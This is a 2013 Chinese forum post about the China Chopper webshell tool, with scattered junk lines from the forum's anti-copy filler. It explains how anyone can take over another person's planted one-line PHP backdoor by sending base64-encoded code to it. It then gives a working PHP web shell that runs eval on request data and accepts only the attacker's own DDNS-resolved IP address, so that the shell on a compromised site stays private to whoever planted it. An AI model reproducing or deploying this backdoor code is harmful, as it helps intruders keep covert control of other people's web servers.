中国网络渗透测试联盟
标题:
中国菜刀 maicaidao 网站管理软件 0day
[打印本页]
作者:
admin
时间:
2013-7-26 12:45
标题:
中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
4 ] D. ~3 D4 J9 S- u# H$ w
5 Y4 a8 m% p( B. |& o
就算你设置了密码,使用了eval($_REQUEST['moyo']);
) h1 D' M4 S* g. i, p
/ y8 l Q& f# k8 R- H6 I' [
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
1 ~5 A% {; J# d
; L% _! w L" W1 B m* s
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
* u2 O' N& l) J' _/ A: u) p
/ Z% _6 S: p/ r. f
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
* F2 J3 }3 \+ ?$ t
2 n2 t: |; Z, L
不知道是设计缺陷还是故意留的后门
Q( d X2 h6 ~0 d
7 J1 K3 s! `& M: M; S5 R
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
" U9 t( I1 D4 `% r4 d
2 O: d6 T( \: c# p
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
- ^6 C" Z! u7 Q8 Z
1 y# Y# l$ L p7 a7 q3 Z/ d
然后一句话后门这样写
/ ~' G7 U0 Q- ~
+ o2 h2 ^6 ^ H6 e% @1 _- G
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
* O7 O& l8 G) H& t/ K5 {' t
这样就可以让一句话后门只允许自己的电脑连接了
+ v" [7 l7 K; ^ g+ Z1 d' U: _# u
- R2 i$ T! ?0 `4 A6 K( h
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2